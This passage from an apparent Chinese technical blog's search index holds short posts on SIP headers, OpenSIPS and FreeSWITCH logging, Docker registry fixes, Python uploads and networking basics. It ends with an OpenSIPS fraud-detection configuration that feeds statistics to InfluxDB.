不要在老代码中直接写自己的代码,应该使用函数。\n在老代码中改动一行,调用自己写的函数。\n几乎每种语言中都有函数这种组织代码的形式,通过见缝插针调用函数的方式。能够尽量减少老代码的改动,如果出现问题,也比较容易调试。","title":"如何维护老代码?"},{"content":"regex101: 功能最强 https://regex101.com/\nregex101的功能最强,支持php, js, python, 和go的正则表达式\nRegulex:正则可视化 https://jex.im/regulex/#!flags=\u0026amp;re=%5E(a%7Cb)*%3F%24\nregulex仅支持js的正则,\nregexper:正则可视化 https://regexper.com/\npyregex:专注python正则 http://www.pyregex.com/\n","permalink":"https://wdd.js.org/fe/regex-tools/","summary":"regex101: 功能最强 https://regex101.com/\nregex101的功能最强,支持php, js, python, 和go的正则表达式\nRegulex:正则可视化 https://jex.im/regulex/#!flags=\u0026amp;re=%5E(a%7Cb)*%3F%24\nregulex仅支持js的正则,\nregexper:正则可视化 https://regexper.com/\npyregex:专注python正则 http://www.pyregex.com/","title":"Regex Tools"},{"content":"基于python # 基于python2 python -m SimpleHTTPServer 8088 # 基于python3 python -m http.server 8088 基于Node.js https://github.com/zeit/serve https://github.com/http-party/http-server ","permalink":"https://wdd.js.org/posts/2019/07/stxzl6/","summary":"基于python # 基于python2 python -m SimpleHTTPServer 8088 # 基于python3 python -m http.server 8088 基于Node.js https://github.com/zeit/serve https://github.com/http-party/http-server ","title":"1秒搭建静态文件服务器"},{"content":"上传文件 import requests headers = { \u0026#34;ssid\u0026#34;:\u0026#34;1234\u0026#34; } files = {\u0026#39;file\u0026#39;: open(\u0026#39;yourfile.tar.gz\u0026#39;, \u0026#39;rb\u0026#39;)} url=\u0026#34;http://localhost:1345/fileUpload/\u0026#34; r = requests.post(url, files=files, headers=headers) print(r.status_code) ","permalink":"https://wdd.js.org/posts/2019/07/ya30bi/","summary":"上传文件 import requests headers = { \u0026#34;ssid\u0026#34;:\u0026#34;1234\u0026#34; } files = {\u0026#39;file\u0026#39;: open(\u0026#39;yourfile.tar.gz\u0026#39;, \u0026#39;rb\u0026#39;)} url=\u0026#34;http://localhost:1345/fileUpload/\u0026#34; r = requests.post(url, files=files, headers=headers) print(r.status_code) ","title":"python request 库学习"},{"content":"fs日志级别\n0 \u0026#34;CONSOLE\u0026#34;, 1 \u0026#34;ALERT\u0026#34;, 2 \u0026#34;CRIT\u0026#34;, 3 \u0026#34;ERR\u0026#34;, 4 \u0026#34;WARNING\u0026#34;, 5 \u0026#34;NOTICE\u0026#34;, 6 \u0026#34;INFO\u0026#34;, 7 \u0026#34;DEBUG\u0026#34; 日志级别设置的越高,显示的日志越多\n在autoload_configs/switch.conf.xml 设置了一些快捷键,可以在fs_cli中使用\nF7将日志级别设置为0,显示的日志最少 F8将日志级别设置为7, 显示日志最多 同时也可以使用 console loglevel指令自定义设置级别\nconsole loglevel 1 console loglevel notice 参考 https://freeswitch.org/confluence/display/FREESWITCH/Troubleshooting+Debugging ","permalink":"https://wdd.js.org/freeswitch/fs-log-level/","summary":"fs日志级别\n0 \u0026#34;CONSOLE\u0026#34;, 1 \u0026#34;ALERT\u0026#34;, 2 \u0026#34;CRIT\u0026#34;, 3 \u0026#34;ERR\u0026#34;, 4 \u0026#34;WARNING\u0026#34;, 5 \u0026#34;NOTICE\u0026#34;, 6 \u0026#34;INFO\u0026#34;, 7 \u0026#34;DEBUG\u0026#34; 日志级别设置的越高,显示的日志越多\n在autoload_configs/switch.conf.xml 设置了一些快捷键,可以在fs_cli中使用\nF7将日志级别设置为0,显示的日志最少 F8将日志级别设置为7, 显示日志最多 同时也可以使用 console loglevel指令自定义设置级别\nconsole loglevel 1 console loglevel notice 参考 https://freeswitch.org/confluence/display/FREESWITCH/Troubleshooting+Debugging ","title":"fs日志级别"},{"content":" from字段用来标记请求的发起者ID to字段用来标记请求接受者的ID to字段并不能用于路由,request-url可以用来路由 一般情况下,sip消息再传输过程中,from和to字段都不会改,而request-url很可能会因为路由而改变 对于最初的请求,除了注册请求之外,request-url和to字段中的url一致 from字段:The From header field is a required header field that indicates the originator of the request. It is one of two addresses used to identify the dialog. The From header field contains a URI, but it may not contain the transport, maddr, or ttl URI parameters. A From header field may contain a tag used to identify a particular call. A From header field may contain a display name, in which case the URI is enclosed in \u0026lt; \u0026gt;. If there is both a URI parameter and a tag, then the URI including any parameters must be enclosed in \u0026lt; \u0026gt;. Examples are shown in Table 6.8. A From tag was optional in RFC 2543 but is mandatory to include in RFC 3261.\nto字段:**The To header field is a required header field in every SIP message used to indicate the recipient of the request. Any responses generated by a UA will contain this header field with the addition of a tag. (Note that an RFC 2543 client will typically only generate a tag if more than one Via header field is present in the request.) Any response generated by a proxy must have a tag added to the To header field. A tag added to the header field in a 200 OK response is used through- out the call and incorporated into the dialog. The To header field URI is never used for routing—the Request-URI is used for this purpose. An optional display name can be present in the header field, in which case the SIP URI is enclosed in \u0026lt; \u0026gt;. If the URI contains any parameters or username parameters, the URI must be enclosed in \u0026lt; \u0026gt; even if no display name is present. The compact form of the header field is t. Examples are shown in Table 6.12.\n上面的信令图属于一个dialog, 并且包含三个事务\ninvite 到 200 ok属于一个事务 ack是单独的一个事务 bye和200 ok属于一个事务 在同一个事务中,from和to中的sip url和tag都是相同的,但是对于不同的事务,from和to头的url和tag会相反。\n# 事务1: INVITE 180 200 From: \u0026lt;sip:a@test.com\u0026gt;;tag=aaa To: \u0026lt;sip:b@test.com\u0026gt;;tag=bbb # 事务2: ACK From: \u0026lt;sip:a@test.com\u0026gt;;tag=aaa To: \u0026lt;sip:b@test.com\u0026gt;;tag=bbb # 事务3: BYE 200 ok # 由于事务3的发起方是B, 所以 From: \u0026lt;sip:b@test.com\u0026gt;;tag=bbb To: \u0026lt;sip:a@test.com\u0026gt;;tag=aaa 所以在处理OpenSIPS脚本的时候,特别是关于from_tag和to_tag的处理的时候,我们不能先入为主的认为初始化和序列化的的所有请求里from_tag和to_tag都是不变的。 也不能先入为主的认为from_url和 to_url是一成不变的。\n所以我们就必须深入的认识到,from和to实际上是标志着这个事务的方向。而不是dialog的方向。\n【重点】初始化请求和序列化请求\nrfc 3261 request url The initial Request-URI of the message SHOULD be set to the value of the URI in the To field. One notable exception is the REGISTER method; behavior for setting the Request-URI of REGISTER is given in Section 10. It may also be undesirable for privacy reasons or convenience to set these fields to the same value (especially if the originating UA expects that the Request-URI will be changed during transit). In some special circumstances, the presence of a pre-existing route set can affect the Request-URI of the message. A pre-existing route set is an ordered set of URIs that identify a chain of servers, to which a UAC will send outgoing requests that are outside of a dialog. Commonly, they are configured on the UA by a user or service provider manually, or through some other non-SIP mechanism. When a provider wishes to configure a UA with an outbound proxy, it is RECOMMENDED that this be done by providing it with a pre-existing route set with a single URI, that of the outbound proxy. When a pre-existing route set is present, the procedures for populating the Request-URI and Route header field detailed in Section 12.2.1.1 MUST be followed (even though there is no dialog), using the desired Request-URI as the remote target URI.\n","permalink":"https://wdd.js.org/opensips/ch1/from-to-request-url/","summary":"from字段用来标记请求的发起者ID to字段用来标记请求接受者的ID to字段并不能用于路由,request-url可以用来路由 一般情况下,sip消息再传输过程中,from和to字段都不会改,而request-url很可能会因为路由而改变 对于最初的请求,除了注册请求之外,request-url和to字段中的url一致 from字段:The From header field is a required header field that indicates the originator of the request. It is one of two addresses used to identify the dialog. The From header field contains a URI, but it may not contain the transport, maddr, or ttl URI parameters. A From header field may contain a tag used to identify a particular call. A From header field may contain a display name, in which case the URI is enclosed in \u0026lt; \u0026gt;.","title":"from vs to vs request-url之间的关系"},{"content":"建议日志格式 xlog(\u0026#34;$rm $fu-\u0026gt;$tu:$cfg_line some msg\u0026#34;) 日志级别 L_ALERT (-3) L_CRIT (-2) L_ERR (-1) - this is used by default if log_level is omitted L_WARN (1) L_NOTICE (2) L_INFO (3) L_DBG (4) 日志级别如果设置为2, 那么只会打印小于等于2的日志。默认使用xlog(\u0026ldquo;hello\u0026rdquo;), 那么日志级别就会是L_ERR\n生产环境建议将日志界别调整到-1\n1.x的opensips使用 debug=3 设置日志级别2.x的opensips使用 log_level=3 设置日志级别\n动态设置日志级别 在程序运行时,可以通过opensipctl 命令动态设置日志级别\nopensipsctl fifo log_level -2 最好使用日志级别 不要为了简便,都用 xlog(\u0026#34;msg\u0026#34;) 如果msg是信息级别,用xlog(\u0026#34;L_INFO\u0026#34;, \u0026#34;msg\u0026#34;) 如果msg是错误信息,则使用xlog(\u0026#34;msg\u0026#34;) ","permalink":"https://wdd.js.org/opensips/ch5/xlog-level/","summary":"建议日志格式 xlog(\u0026#34;$rm $fu-\u0026gt;$tu:$cfg_line some msg\u0026#34;) 日志级别 L_ALERT (-3) L_CRIT (-2) L_ERR (-1) - this is used by default if log_level is omitted L_WARN (1) L_NOTICE (2) L_INFO (3) L_DBG (4) 日志级别如果设置为2, 那么只会打印小于等于2的日志。默认使用xlog(\u0026ldquo;hello\u0026rdquo;), 那么日志级别就会是L_ERR\n生产环境建议将日志界别调整到-1\n1.x的opensips使用 debug=3 设置日志级别2.x的opensips使用 log_level=3 设置日志级别\n动态设置日志级别 在程序运行时,可以通过opensipctl 命令动态设置日志级别\nopensipsctl fifo log_level -2 最好使用日志级别 不要为了简便,都用 xlog(\u0026#34;msg\u0026#34;) 如果msg是信息级别,用xlog(\u0026#34;L_INFO\u0026#34;, \u0026#34;msg\u0026#34;) 如果msg是错误信息,则使用xlog(\u0026#34;msg\u0026#34;) ","title":"日志xlog"},{"content":" 变量不要使用缩写,要见名知意。现代化的IDE都提供自动补全功能,即使是VIM, 也可以用ctrl+n, ctrl+p, ctrl+y, ctrl+e去自动补全。 变量名缩写真是灾难。 ","permalink":"https://wdd.js.org/posts/2019/07/pxdvcx/","summary":" 变量不要使用缩写,要见名知意。现代化的IDE都提供自动补全功能,即使是VIM, 也可以用ctrl+n, ctrl+p, ctrl+y, ctrl+e去自动补全。 变量名缩写真是灾难。 ","title":"编码规则"},{"content":"图片来自 https://microchipdeveloper.com/ 只不过这个网站访问速度很慢,但是里面的图片非常有意思,能够简洁明了的说明一个概念。\n上学的时候,数学老师喜欢在讲课前先讲一些概念,然后再做题。但是我觉得概念并没有那么重要,我更喜欢做题。\n但是,当你理解了概念后,再去实战,就有事半功倍的效果。\n1. 路由器 路由器(英语:Router,又称路径器)是一种电讯网络设备,提供路由与转送两种重要机制,可以决定数据包从来源端到目的端所经过的路由路径(host到host之间的传输路径),这个过程称为路由;将路由器输入端的数据包移送至适当的路由器输出端(在路由器内部进行),这称为转送。路由工作在OSI模型的第三层——即网络层,例如网际协议(IP)。\n路由器用来做网络之间的链接,所以路由器一般至少会链接到两个网络上。常见的就是一边连接外网,一边连接内网。\n2. IP地址 3. 交换机 4. 五层网络模型 5. TCP vs UDP 6. TCP 和 UDP 头 7. 常见的端口号 8. 客户端和服务端 9. Socket 10. Socket建立 11. 一个Web服务器的工作过程s step1: 服务器在80端口监听消息 step2: 客户端随机选择一个端口,向服务端发起连接请求 step3: 传输层将消息传输给服务器 服务端建立一个Socket用来和客户端建立通道\nstep4: 服务器通过socket将html发给客户端 step5: 消息接受完毕,Socket关闭 12 NAT 参考 https://zh.wikipedia.org/wiki/%E8%B7%AF%E7%94%B1%E5%99%A8 ","permalink":"https://wdd.js.org/network/graph-network/","summary":"图片来自 https://microchipdeveloper.com/ 只不过这个网站访问速度很慢,但是里面的图片非常有意思,能够简洁明了的说明一个概念。\n上学的时候,数学老师喜欢在讲课前先讲一些概念,然后再做题。但是我觉得概念并没有那么重要,我更喜欢做题。\n但是,当你理解了概念后,再去实战,就有事半功倍的效果。\n1. 路由器 路由器(英语:Router,又称路径器)是一种电讯网络设备,提供路由与转送两种重要机制,可以决定数据包从来源端到目的端所经过的路由路径(host到host之间的传输路径),这个过程称为路由;将路由器输入端的数据包移送至适当的路由器输出端(在路由器内部进行),这称为转送。路由工作在OSI模型的第三层——即网络层,例如网际协议(IP)。\n路由器用来做网络之间的链接,所以路由器一般至少会链接到两个网络上。常见的就是一边连接外网,一边连接内网。\n2. IP地址 3. 交换机 4. 五层网络模型 5. TCP vs UDP 6. TCP 和 UDP 头 7. 常见的端口号 8. 客户端和服务端 9. Socket 10. Socket建立 11. 一个Web服务器的工作过程s step1: 服务器在80端口监听消息 step2: 客户端随机选择一个端口,向服务端发起连接请求 step3: 传输层将消息传输给服务器 服务端建立一个Socket用来和客户端建立通道\nstep4: 服务器通过socket将html发给客户端 step5: 消息接受完毕,Socket关闭 12 NAT 参考 https://zh.wikipedia.org/wiki/%E8%B7%AF%E7%94%B1%E5%99%A8 ","title":"图解通信网络 第二版"},{"content":"使用HTTP仓库 默认docker不允许使用HTTP的仓库,只允许HTTPS的仓库。如果你用http的仓库,可能会报如下的错误。\nGet https://registry:5000/v1/_ping: http: server gave HTTP response to HTTPS client\n解决方案是:配置insecure-registries使docker使用我们的http仓库。\n在 /etc/docker/daemon.json 文件中添加\n{ \u0026#34;insecure-registries\u0026#34; : [\u0026#34;registry:5000\u0026#34;, \u0026#34;harbor:5000\u0026#34;] } 重启docker\nservice docker restart # 执行命令 docker info | grep insecure 应该可以看到不安全仓库 存储问题 有些docker的存储策略并未指定,在运行容器时,可能会报如下错误\n/usr/bin/docker-current: Error response from daemon: error creating overlay mount to\n解决方案:\nvim /etc/sysconfig/docker-storage\nDOCKER_STORAGE_OPTIONS=\u0026#34;-s overlay\u0026#34; systemctl daemon-reload service docker restart ","permalink":"https://wdd.js.org/posts/2019/07/fpbkzg/","summary":"使用HTTP仓库 默认docker不允许使用HTTP的仓库,只允许HTTPS的仓库。如果你用http的仓库,可能会报如下的错误。\nGet https://registry:5000/v1/_ping: http: server gave HTTP response to HTTPS client\n解决方案是:配置insecure-registries使docker使用我们的http仓库。\n在 /etc/docker/daemon.json 文件中添加\n{ \u0026#34;insecure-registries\u0026#34; : [\u0026#34;registry:5000\u0026#34;, \u0026#34;harbor:5000\u0026#34;] } 重启docker\nservice docker restart # 执行命令 docker info | grep insecure 应该可以看到不安全仓库 存储问题 有些docker的存储策略并未指定,在运行容器时,可能会报如下错误\n/usr/bin/docker-current: Error response from daemon: error creating overlay mount to\n解决方案:\nvim /etc/sysconfig/docker-storage\nDOCKER_STORAGE_OPTIONS=\u0026#34;-s overlay\u0026#34; systemctl daemon-reload service docker restart ","title":"Docker相关问题及解决方案"},{"content":"# # $Id$ # # OpenSIPS residential configuration script # by OpenSIPS Solutions \u0026lt;team@opensips-solutions.com\u0026gt; # # This script was generated via \u0026#34;make menuconfig\u0026#34;, from # the \u0026#34;Residential\u0026#34; scenario. # You can enable / disable more features / functionalities by # re-generating the scenario with different options.# # # Please refer to the Core CookBook at: # http://www.opensips.org/Resources/DocsCookbooks # for a explanation of possible statements, functions and parameters. # ####### Global Parameters ######### log_level=3 log_stderror=yes log_facility=LOG_LOCAL0 children=4 memdump=-1 /* uncomment the following line to enable debugging */ #debug_mode=yes /* uncomment the next line to enable the auto temporary blacklisting of not available destinations (default disabled) */ #disable_dns_blacklist=no /* uncomment the next line to enable IPv6 lookup after IPv4 dns lookup failures (default disabled) */ #dns_try_ipv6=yes /* comment the next line to enable the auto discovery of local aliases based on revers DNS on IPs */ auto_aliases=no listen=udp:127.0.0.1:5060 # CUSTOMIZE ME listen=udp:10.0.2.8:5060 # CUSTOMIZE ME ####### Modules Section ######## #set module path mpath=\u0026#34;modules/\u0026#34; loadmodule \u0026#34;proto_udp.so\u0026#34; #### SIGNALING module loadmodule \u0026#34;signaling.so\u0026#34; #### StateLess module loadmodule \u0026#34;sl.so\u0026#34; #### Transaction Module loadmodule \u0026#34;tm.so\u0026#34; modparam(\u0026#34;tm\u0026#34;, \u0026#34;fr_timeout\u0026#34;, 5) modparam(\u0026#34;tm\u0026#34;, \u0026#34;fr_inv_timeout\u0026#34;, 30) modparam(\u0026#34;tm\u0026#34;, \u0026#34;restart_fr_on_each_reply\u0026#34;, 0) modparam(\u0026#34;tm\u0026#34;, \u0026#34;onreply_avp_mode\u0026#34;, 1) #### Record Route Module loadmodule \u0026#34;rr.so\u0026#34; /* do not append from tag to the RR (no need for this script) */ modparam(\u0026#34;rr\u0026#34;, \u0026#34;append_fromtag\u0026#34;, 0) #### MAX ForWarD module loadmodule \u0026#34;maxfwd.so\u0026#34; #### SIP MSG OPerationS module loadmodule \u0026#34;sipmsgops.so\u0026#34; #### FIFO Management Interface loadmodule \u0026#34;mi_fifo.so\u0026#34; modparam(\u0026#34;mi_fifo\u0026#34;, \u0026#34;fifo_name\u0026#34;, \u0026#34;/tmp/opensips_fifo\u0026#34;) modparam(\u0026#34;mi_fifo\u0026#34;, \u0026#34;fifo_mode\u0026#34;, 0666) #### URI module loadmodule \u0026#34;uri.so\u0026#34; modparam(\u0026#34;uri\u0026#34;, \u0026#34;use_uri_table\u0026#34;, 0) #### USeR LOCation module loadmodule \u0026#34;usrloc.so\u0026#34; modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;nat_bflag\u0026#34;, \u0026#34;NAT\u0026#34;) modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;db_mode\u0026#34;, 1) modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;db_url\u0026#34;, \u0026#34;mysql://root:summit2017@127.0.0.1/opensips_2_3\u0026#34;) #### REGISTRAR module loadmodule \u0026#34;registrar.so\u0026#34; loadmodule \u0026#34;drouting.so\u0026#34; modparam(\u0026#34;drouting\u0026#34;, \u0026#34;db_url\u0026#34;, \u0026#34;mysql://root:summit2017@127.0.0.1/opensips_2_3\u0026#34;) loadmodule \u0026#34;fraud_detection.so\u0026#34; modparam(\u0026#34;fraud_detection\u0026#34;, \u0026#34;db_url\u0026#34;, \u0026#34;mysql://root:summit2017@127.0.0.1/opensips_2_3\u0026#34;) loadmodule \u0026#34;event_route.so\u0026#34; loadmodule \u0026#34;cachedb_local.so\u0026#34; #loadmodule \u0026#34;aaa_radius.so\u0026#34; #modparam(\u0026#34;aaa_radius\u0026#34;,\u0026#34;radius_config\u0026#34;,\u0026#34;modules/acc/etc/radius/radiusclient.conf\u0026#34;) #### ACCounting module loadmodule \u0026#34;acc.so\u0026#34; /* what special events should be accounted ? */ #modparam(\u0026#34;acc\u0026#34;, \u0026#34;aaa_url\u0026#34;, \u0026#34;radius:modules/acc/etc/radius/radiusclient.conf\u0026#34;) modparam(\u0026#34;acc\u0026#34;, \u0026#34;early_media\u0026#34;, 0) modparam(\u0026#34;acc\u0026#34;, \u0026#34;report_cancels\u0026#34;, 0) /* by default we do not adjust the direct of the sequential requests. if you enable this parameter, be sure the enable \u0026#34;append_fromtag\u0026#34; in \u0026#34;rr\u0026#34; module */ modparam(\u0026#34;acc\u0026#34;, \u0026#34;detect_direction\u0026#34;, 0) #modparam(\u0026#34;acc\u0026#34;, \u0026#34;multi_leg_info\u0026#34;, \u0026#34;text1=$avp(src);text2=$avp(dst)\u0026#34;) #modparam(\u0026#34;acc\u0026#34;, \u0026#34;multi_leg_bye_info\u0026#34;, \u0026#34;text1=$avp(src);text2=$avp(dst)\u0026#34;) /* account triggers (flags) */ loadmodule \u0026#34;avpops.so\u0026#34; modparam(\u0026#34;avpops\u0026#34;, \u0026#34;db_url\u0026#34;, \u0026#34;1 mysql://root:summit2017@127.0.0.1/opensips_2_3\u0026#34;) loadmodule \u0026#34;db_mysql.so\u0026#34; modparam(\u0026#34;db_mysql\u0026#34;, \u0026#34;exec_query_threshold\u0026#34;, 500000) loadmodule \u0026#34;cfgutils.so\u0026#34; loadmodule \u0026#34;dialog.so\u0026#34; loadmodule \u0026#34;rest_client.so\u0026#34; loadmodule \u0026#34;dispatcher.so\u0026#34; modparam(\u0026#34;dispatcher\u0026#34;, \u0026#34;db_url\u0026#34;, \u0026#34;mysql://root:summit2017@127.0.0.1/opensips_2_3\u0026#34;) ####### Routing Logic ######## # main request routing logic route { if (!mf_process_maxfwd_header(\u0026#34;10\u0026#34;)) { sl_send_reply(\u0026#34;483\u0026#34;,\u0026#34;Too Many Hops\u0026#34;); exit; } if (has_totag()) { # sequential requests within a dialog should # take the path determined by record-routing if (loose_route()) { if (is_method(\u0026#34;INVITE\u0026#34;)) { # even if in most of the cases is useless, do RR for # re-INVITEs alos, as some buggy clients do change route set # during the dialog. record_route(); } # route it out to whatever destination was set by loose_route() # in $du (destination URI). route(relay); } else { if ( is_method(\u0026#34;ACK\u0026#34;) ) { if ( t_check_trans() ) { # non loose-route, but stateful ACK; must be an ACK after # a 487 or e.g. 404 from upstream server t_relay(); exit; } else { # ACK without matching transaction -\u0026gt; # ignore and discard exit; } } sl_send_reply(\u0026#34;404\u0026#34;,\u0026#34;Not here\u0026#34;); } exit; } if (is_method(\u0026#34;REGISTER\u0026#34;)) { if (!save(\u0026#34;location\u0026#34;)) sl_reply_error(); exit; } # CANCEL processing if (is_method(\u0026#34;CANCEL\u0026#34;)) { if (t_check_trans()) t_relay(); exit; } t_check_trans(); if ( !(is_method(\u0026#34;REGISTER\u0026#34;) ) ) { if (from_uri==myself) { } else { # if caller is not local, then called number must be local } } # preloaded route checking if (loose_route()) { xlog(\u0026#34;L_ERR\u0026#34;, \u0026#34;Attempt to route with preloaded Route\u0026#39;s [$fu/$tu/$ru/$ci]\u0026#34;); if (!is_method(\u0026#34;ACK\u0026#34;)) sl_send_reply(\u0026#34;403\u0026#34;,\u0026#34;Preload Route denied\u0026#34;); exit; } # record routing if (!is_method(\u0026#34;REGISTER|MESSAGE\u0026#34;)) record_route(); # account only INVITEs if (is_method(\u0026#34;INVITE\u0026#34;)) { create_dialog(); do_accounting(\u0026#34;evi\u0026#34;, \u0026#34;cdr|missed|failed\u0026#34;); } if (!uri==myself) { append_hf(\u0026#34;P-hint: outbound\\r\\n\u0026#34;); route(relay); } # requests for my domain if (is_method(\u0026#34;PUBLISH|SUBSCRIBE\u0026#34;)) { sl_send_reply(\u0026#34;503\u0026#34;, \u0026#34;Service Unavailable\u0026#34;); exit; } if ($rU==NULL) { # request with no Username in RURI sl_send_reply(\u0026#34;484\u0026#34;,\u0026#34;Address Incomplete\u0026#34;); exit; } if (!check_fraud(\u0026#34;$fU\u0026#34;, \u0026#34;$rU\u0026#34;, \u0026#34;2\u0026#34;)) { send_reply(\u0026#34;403\u0026#34;, \u0026#34;Forbidden\u0026#34;); exit; } $du = \u0026#34;sip:10.0.2.8:7050\u0026#34;; route(relay); } route [relay] { # for INVITEs enable some additional helper routes if (is_method(\u0026#34;INVITE\u0026#34;)) { t_on_branch(\u0026#34;per_branch_ops\u0026#34;); t_on_reply(\u0026#34;handle_nat\u0026#34;); t_on_failure(\u0026#34;missed_call\u0026#34;); } if (!t_relay()) { send_reply(\u0026#34;500\u0026#34;,\u0026#34;Internal Error\u0026#34;); }; exit; } branch_route[per_branch_ops] { xlog(\u0026#34;new branch at $ru\\n\u0026#34;); } onreply_route[handle_nat] { xlog(\u0026#34;incoming reply\\n\u0026#34;); } route [ds_route] { xlog(\u0026#34;foo\\n\u0026#34;); } failure_route[missed_call] { if (t_was_cancelled()) { exit; } # uncomment the following lines if you want to block client # redirect based on 3xx replies. ##if (t_check_status(\u0026#34;3[0-9][0-9]\u0026#34;)) { ##t_reply(\u0026#34;404\u0026#34;,\u0026#34;Not found\u0026#34;); ##\texit; ##} } event_route [E_FRD_WARNING] { fetch_event_params(\u0026#34;$var(param);$var(val);$var(thr);$var(user);$var(number);$var(ruleid)\u0026#34;); xlog(\u0026#34;E_FRD_WARNING: $var(param);$var(val);$var(thr);$var(user);$var(number);$var(ruleid)\\n\u0026#34;); if ($var(param) == \u0026#34;calls per minute\u0026#34;) { xlog(\u0026#34;e_frd_cpm++!\\n\u0026#34;); cache_add(\u0026#34;local\u0026#34;, \u0026#34;e_frd_cpm\u0026#34;, 1, 0); } else if ($var(param) == \u0026#34;call_duration\u0026#34;) { xlog(\u0026#34;e_frd_cdur++!\\n\u0026#34;); cache_add(\u0026#34;local\u0026#34;, \u0026#34;e_frd_cdur\u0026#34;, 1, 0); } else if ($var(param) == \u0026#34;total calls\u0026#34;) { xlog(\u0026#34;e_frd_tc++!\\n\u0026#34;); cache_add(\u0026#34;local\u0026#34;, \u0026#34;e_frd_tc\u0026#34;, 1, 0); } else if ($var(param) == \u0026#34;concurrent calls\u0026#34;) { xlog(\u0026#34;e_frd_cc++!\\n\u0026#34;); cache_add(\u0026#34;local\u0026#34;, \u0026#34;e_frd_cc\u0026#34;, 1, 0); } else if ($var(param) == \u0026#34;sequential calls\u0026#34;) { xlog(\u0026#34;e_frd_seq++!\\n\u0026#34;); cache_add(\u0026#34;local\u0026#34;, \u0026#34;e_frd_seq\u0026#34;, 1, 0); } } event_route [E_FRD_CRITICAL] { fetch_event_params(\u0026#34;$var(param);$var(val);$var(thr);$var(user);$var(number);$var(ruleid)\u0026#34;); xlog(\u0026#34;E_FRD_CRITICAL: $var(param);$var(val);$var(thr);$var(user);$var(number);$var(ruleid)\\n\u0026#34;); if ($var(param) == \u0026#34;calls per minute\u0026#34;) { xlog(\u0026#34;e_frd_critcpm++\\n\u0026#34;); cache_add(\u0026#34;local\u0026#34;, \u0026#34;e_frd_critcpm\u0026#34;, 1, 0); } else if ($var(param) == \u0026#34;call_duration\u0026#34;) { xlog(\u0026#34;e_frd_critcdur++\\n\u0026#34;); cache_add(\u0026#34;local\u0026#34;, \u0026#34;e_frd_critcdur\u0026#34;, 1, 0); } else if ($var(param) == \u0026#34;total calls\u0026#34;) { xlog(\u0026#34;e_frd_crittc++!\\n\u0026#34;); cache_add(\u0026#34;local\u0026#34;, \u0026#34;e_frd_crittc\u0026#34;, 1, 0); } else if ($var(param) == \u0026#34;concurrent calls\u0026#34;) { xlog(\u0026#34;e_frd_critcc++!\\n\u0026#34;); cache_add(\u0026#34;local\u0026#34;, \u0026#34;e_frd_critcc\u0026#34;, 1, 0); } else if ($var(param) == \u0026#34;sequential calls\u0026#34;) { xlog(\u0026#34;e_frd_critseq++!\\n\u0026#34;); cache_add(\u0026#34;local\u0026#34;, \u0026#34;e_frd_critseq\u0026#34;, 1, 0); } } route [store_influxdb] { $var(body) = $param(2) + \u0026#34;,host=\u0026#34; + $param(3) + \u0026#34; value=\u0026#34; + $param(4); xlog(\u0026#34;XXX posting: $var(body) ($param(1) / $param(2) / $param(4))\\n\u0026#34;); if (!rest_post(\u0026#34;http://localhost:8086/write?db=$param(1)\u0026#34;, \u0026#34;$var(body)\u0026#34;, , \u0026#34;$var(body)\u0026#34;)) { xlog(\u0026#34;ERR in rest_post!\\n\u0026#34;); exit; } } timer_route [dump_fraud_cpm, 1] { $var(cpm) = 0; $var(ccpm) = 0; cache_counter_fetch(\u0026#34;local\u0026#34;, \u0026#34;e_frd_cpm\u0026#34;, $var(cpm)); cache_counter_fetch(\u0026#34;local\u0026#34;, \u0026#34;e_frd_critcpm\u0026#34;, $var(ccpm)); cache_remove(\u0026#34;local\u0026#34;, \u0026#34;e_frd_cpm\u0026#34;); cache_remove(\u0026#34;local\u0026#34;, \u0026#34;e_frd_critcpm\u0026#34;); route(store_influxdb, \u0026#34;fraud_demo\u0026#34;, \u0026#34;cpm\u0026#34;, \u0026#34;serverA\u0026#34;, $var(cpm)); route(store_influxdb, \u0026#34;fraud_demo\u0026#34;, \u0026#34;critcpm\u0026#34;, \u0026#34;serverA\u0026#34;, $var(ccpm)); xlog(\u0026#34;XXX stats: $var(cpm) / $var(ccpm)\\n\u0026#34;); } timer_route [dump_fraud_cdur, 1] { $var(cdur) = 0; $var(ccdur) = 0; cache_counter_fetch(\u0026#34;local\u0026#34;, \u0026#34;e_frd_cdur\u0026#34;, $var(cdur)); cache_counter_fetch(\u0026#34;local\u0026#34;, \u0026#34;e_frd_critcdur\u0026#34;, $var(ccdur)); cache_remove(\u0026#34;local\u0026#34;, \u0026#34;e_frd_cdur\u0026#34;); cache_remove(\u0026#34;local\u0026#34;, \u0026#34;e_frd_critcdur\u0026#34;); route(store_influxdb, \u0026#34;fraud_demo\u0026#34;, \u0026#34;cdur\u0026#34;, \u0026#34;serverA\u0026#34;, $var(cdur)); route(store_influxdb, \u0026#34;fraud_demo\u0026#34;, \u0026#34;critcdur\u0026#34;, \u0026#34;serverA\u0026#34;, $var(ccdur)); xlog(\u0026#34;XXX stats: $var(cdur) / $var(ccdur)\\n\u0026#34;); } timer_route [dump_fraud_tc, 1] { $var(tc) = 0; $var(ctc) = 0; cache_counter_fetch(\u0026#34;local\u0026#34;, \u0026#34;e_frd_tc\u0026#34;, $var(tc)); cache_counter_fetch(\u0026#34;local\u0026#34;, \u0026#34;e_frd_crittc\u0026#34;, $var(ctc)); cache_remove(\u0026#34;local\u0026#34;, \u0026#34;e_frd_tc\u0026#34;); cache_remove(\u0026#34;local\u0026#34;, \u0026#34;e_frd_crittc\u0026#34;); route(store_influxdb, \u0026#34;fraud_demo\u0026#34;, \u0026#34;tc\u0026#34;, \u0026#34;serverA\u0026#34;, $var(tc)); route(store_influxdb, \u0026#34;fraud_demo\u0026#34;, \u0026#34;crittc\u0026#34;, \u0026#34;serverA\u0026#34;, $var(ctc)); xlog(\u0026#34;XXX stats: $var(tc) / $var(ctc)\\n\u0026#34;); } timer_route [dump_fraud_cc, 1] { $var(cc) = 0; $var(ccc) = 0; cache_counter_fetch(\u0026#34;local\u0026#34;, \u0026#34;e_frd_cc\u0026#34;, $var(cc)); cache_counter_fetch(\u0026#34;local\u0026#34;, \u0026#34;e_frd_critcc\u0026#34;, $var(ccc)); cache_remove(\u0026#34;local\u0026#34;, \u0026#34;e_frd_cc\u0026#34;); cache_remove(\u0026#34;local\u0026#34;, \u0026#34;e_frd_critcc\u0026#34;); route(store_influxdb, \u0026#34;fraud_demo\u0026#34;, \u0026#34;cc\u0026#34;, \u0026#34;serverA\u0026#34;, $var(cc)); route(store_influxdb, \u0026#34;fraud_demo\u0026#34;, \u0026#34;critcc\u0026#34;, 